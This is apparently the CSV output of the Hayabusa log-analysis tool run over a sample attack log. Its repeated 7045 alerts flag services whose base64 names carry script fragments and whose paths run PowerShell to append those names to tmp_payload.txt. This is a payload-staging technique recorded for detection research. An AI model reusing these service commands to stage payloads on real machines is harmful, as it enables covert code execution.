tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:00.108 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICgkSXRlbSBpbiAkRHJvcERvd25PcHRpb25zKSB7DQogICAgICAgICBbdm9pZF0gJERyb3BEb3duLkl0ZW1zLkFkZCgkSXRlbSkNCiAgICAgICAgfQ0KDQogICAgICAgICRGb3JtLkNvbnRyb2xzLk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" 2021-11-03 17:20:00.108 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICgkSXRlbSBpbiAkRHJvcERvd25PcHRpb25zKSB7DQogICAgICAgICBbdm9pZF0gJERyb3BEb3duLkl0ZW1zLkFkZCgkSXRlbSkNCiAgICAgICAgfQ0KDQogICAgICAgICRGb3JtLkNvbnRyb2xzLk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:00.108 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICgkSXRlbSBpbiAkRHJvcERvd25PcHRpb25zKSB7DQogICAgICAgICBbdm9pZF0gJERyb3BEb3duLkl0ZW1zLkFkZCgkSXRlbSkNCiAgICAgICAgfQ0KDQogICAgICAgICRGb3JtLkNvbnRyb2xzLk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:01.550 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: FkZCgkRHJvcERvd24pDQoNCiAgICAgICAgJERyb3BEb3duTGFiZWwgPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkxhYmVsDQogICAgICAgICREcm9wRG93bkxhYmVsLkxvY2F0aW9u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:01.550 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: FkZCgkRHJvcERvd24pDQoNCiAgICAgICAgJERyb3BEb3duTGFiZWwgPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkxhYmVsDQogICAgICAgICREcm9wRG93bkxhYmVsLkxvY2F0aW9u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:01.550 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: FkZCgkRHJvcERvd24pDQoNCiAgICAgICAgJERyb3BEb3duTGFiZWwgPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkxhYmVsDQogICAgICAgICREcm9wRG93bkxhYmVsLkxvY2F0aW9u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:03.020 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEwLDEwKSANCiAgICAgICAgJERyb3BEb3duTGFiZWwuc2l6ZSA9IG5ldy1vYmplY3QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMjApIA | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:03.020 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEwLDEwKSANCiAgICAgICAgJERyb3BEb3duTGFiZWwuc2l6ZSA9IG5ldy1vYmplY3QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMjApIA | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:03.020 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEwLDEwKSANCiAgICAgICAgJERyb3BEb3duTGFiZWwuc2l6ZSA9IG5ldy1vYmplY3QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMjApIA | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:04.472 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 0KICAgICAgICAkRHJvcERvd25MYWJlbC5UZXh0ID0gIk9wdGlvbnM6Ig0KICAgICAgICAkRm9ybS5Db250cm9scy5BZGQoJERyb3BEb3duTGFiZWwpDQoNCiAgICAgICAgJEJ1dHRvbiA9IG5ldy1v | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:04.472 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KICAgICAgICAkRHJvcERvd25MYWJlbC5UZXh0ID0gIk9wdGlvbnM6Ig0KICAgICAgICAkRm9ybS5Db250cm9scy5BZGQoJERyb3BEb3duTGFiZWwpDQoNCiAgICAgICAgJEJ1dHRvbiA9IG5ldy1v | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:04.472 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KICAgICAgICAkRHJvcERvd25MYWJlbC5UZXh0ID0gIk9wdGlvbnM6Ig0KICAgICAgICAkRm9ybS5Db250cm9scy5BZGQoJERyb3BEb3duTGFiZWwpDQoNCiAgICAgICAgJEJ1dHRvbiA9IG5ldy1v | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:05.916 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: YmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuQnV0dG9uDQogICAgICAgICRCdXR0b24uTG9jYXRpb24gPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDUwKQ0KICAgICAgICAkQn | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:05.916 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: YmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuQnV0dG9uDQogICAgICAgICRCdXR0b24uTG9jYXRpb24gPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDUwKQ0KICAgICAgICAkQn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:05.916 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: YmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuQnV0dG9uDQogICAgICAgICRCdXR0b24uTG9jYXRpb24gPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDUwKQ0KICAgICAgICAkQn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:07.360 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 
V0dG9uLlNpemUgPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDIwKQ0KICAgICAgICAkQnV0dG9uLlRleHQgPSAiU3VibWl0Ig0KICAgICAgICAkQnV0dG9uLkFkZF9DbGljayh7 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg202"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:07.360 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: V0dG9uLlNpemUgPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDIwKQ0KICAgICAgICAkQnV0dG9uLlRleHQgPSAiU3VibWl0Ig0KICAgICAgICAkQnV0dG9uLkFkZF9DbGljayh7 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg202"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:07.360 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: V0dG9uLlNpemUgPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDIwKQ0KICAgICAgICAkQnV0dG9uLlRleHQgPSAiU3VibWl0Ig0KICAgICAgICAkQnV0dG9uLkFkZF9DbGljayh7 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg202"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:08.810 
+09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: UmV0dXJuLURyb3BEb3dufSkNCiAgICAgICAgJGZvcm0uQ29udHJvbHMuQWRkKCRCdXR0b24pDQoNCiAgICAgICAgJERyb3BEb3duLlNlbGVjdGVkSW5kZXggPSAgMA0KICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg203"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:08.810 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: UmV0dXJuLURyb3BEb3dufSkNCiAgICAgICAgJGZvcm0uQ29udHJvbHMuQWRkKCRCdXR0b24pDQoNCiAgICAgICAgJERyb3BEb3duLlNlbGVjdGVkSW5kZXggPSAgMA0KICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg203"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:08.810 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: UmV0dXJuLURyb3BEb3dufSkNCiAgICAgICAgJGZvcm0uQ29udHJvbHMuQWRkKCRCdXR0b24pDQoNCiAgICAgICAgJERyb3BEb3duLlNlbGVjdGVkSW5kZXggPSAgMA0KICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg203"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" 2021-11-03 17:20:10.268 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgJEZvcm0uQWRkX1Nob3duKHskRm9ybS5BY3RpdmF0ZSgpfSkNCiAgICAgICAgW3ZvaWRdICRGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgICRDaG9pY2UNCiAgICAgfQ0KICAgICANCiAgICBj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg204"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:10.268 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgJEZvcm0uQWRkX1Nob3duKHskRm9ybS5BY3RpdmF0ZSgpfSkNCiAgICAgICAgW3ZvaWRdICRGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgICRDaG9pY2UNCiAgICAgfQ0KICAgICANCiAgICBj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg204"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:10.268 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgJEZvcm0uQWRkX1Nob3duKHskRm9ybS5BY3RpdmF0ZSgpfSkNCiAgICAgICAgW3ZvaWRdICRGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgICRDaG9pY2UNCiAgICAgfQ0KICAgICANCiAgICBj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg204"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:11.713 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: YXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBnZW5lcmF0ZSBpbnB1dCBkcm9wIGRvd24iDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJEVycm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg205"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:11.713 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: YXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBnZW5lcmF0ZSBpbnB1dCBkcm9wIGRvd24iDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJEVycm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg205"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:11.713 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: YXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBnZW5lcmF0ZSBpbnB1dCBkcm9wIGRvd24iDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJEVycm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg205"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:13.158 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIkNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg206"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:13.158 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIkNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg206"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:13.158 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIkNh | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg206"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:14.614 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: dWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQoNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg207"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:14.614 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQoNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg207"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:14.614 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 
dWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQoNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg207"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:16.115 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdldCB0aGUgbGlzdCBvZiBjb21wdXRlcnMgYmFzZWQgb24gdGhlIHVzZXJzIHNl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg208"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:16.115 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdldCB0aGUgbGlzdCBvZiBjb21wdXRlcnMgYmFzZWQgb24gdGhlIHVzZXJzIHNl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg208"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:16.115 
+09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdldCB0aGUgbGlzdCBvZiBjb21wdXRlcnMgYmFzZWQgb24gdGhlIHVzZXJzIHNl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg208"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:17.556 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: bGVjdGVkIGxpc3QgdHlwZQ0KDQojQHBhcmFtICRDb21wdXRlckxpc3RUeXBlICAgLT4gVGhlIHR5cGUgb2YgY29tcHV0ZXIgbGlzdCAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 